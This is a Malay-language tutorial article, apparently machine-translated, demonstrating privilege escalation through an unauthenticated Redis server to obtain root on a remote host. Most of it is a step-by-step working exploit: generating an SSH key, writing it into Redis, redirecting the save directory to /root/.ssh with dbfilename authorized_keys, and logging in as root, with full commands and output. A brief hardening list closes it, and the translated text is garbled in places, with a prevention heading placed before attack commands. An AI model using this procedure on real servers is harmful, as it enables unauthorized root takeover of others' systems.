Rumah > Artikel > pangkalan data > Mari kita bincangkan tentang prinsip perlombongan Redis (contoh terperinci)
Artikel ini membawakan anda pengetahuan yang berkaitan tentang prinsip perlombongan Redis Di sini kami akan menunjukkan cara menggunakan Redis untuk meningkatkan keistimewaan untuk mendapatkan pengguna root pelayan jauh, dan cara melindunginya harap ia akan membantu Semua orang membantu.
Pembelajaran yang disyorkan: Tutorial video Redis
Hari ini kami akan menunjukkan cara untuk meningkatkan keistimewaan melalui Redis untuk mendapatkan pengguna Root bagi pelayan jauh.
1. Mula-mula kita memerlukan beberapa prasyarat
Syarat 1: Anda mesti mempunyai Redis dahulu, dan kami perlu mengetahui portnya【 Lalai 6379];
Syarat 2: Kata laluan untuk Redis tidak boleh terlalu rumit, atau tiada kata laluan; yang memulakan Redis adalah yang paling Untungnya, ia adalah pengguna Root, yang lebih merosakkan; >
Seterusnya, nilai kunci serangan dijana melalui kunci awam
Tujuan menambah dua baris baharu sebelum dan selepas di sini adalah untuk menghalang sambungan data Bersama-sama mereka menyebabkan masalah kegagalan.
root@kali:/usr/local/src# ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txt
Operasi adalah seperti berikut:
root@kali:/tmp/rediskey# cat foo.txt ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali
Log masuk ke Redis Semak sama ada ia telah ditulis kepada Redis.
2.3 Gantikan fail sistem melalui mekanisme penjimatan Redis
root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar OKPada masa ini, kami log masuk ke hos jauh untuk melihat kesannya.
root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129 192.168.243.129:6379> get bar "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"
3. Bagaimana untuk mencegah
192.168.243.129:6379> config set dir /root/.ssh OK 192.168.243.129:6379> config get dir 1) "dir" 2) "/root/.ssh" 192.168.243.129:6379> config set dbfilename "authorized_keys" OK 192.168.243.129:6379> save OK 192.168.243.129:6379> exit
root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129 The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established. ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts. Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64 Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1 root@kali:~#Redis tidak seharusnya dipantau pada IP berbahaya Jika ya, sila tambah kawalan tembok api
Sekatan Kata Laluan Redis mesti ditingkatkan dan tidak boleh menjadi kata laluan yang lemah;
Cuba untuk tidak memulakan Redis sebagai pengguna Root.Atas ialah kandungan terperinci Mari kita bincangkan tentang prinsip perlombongan Redis (contoh terperinci). Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!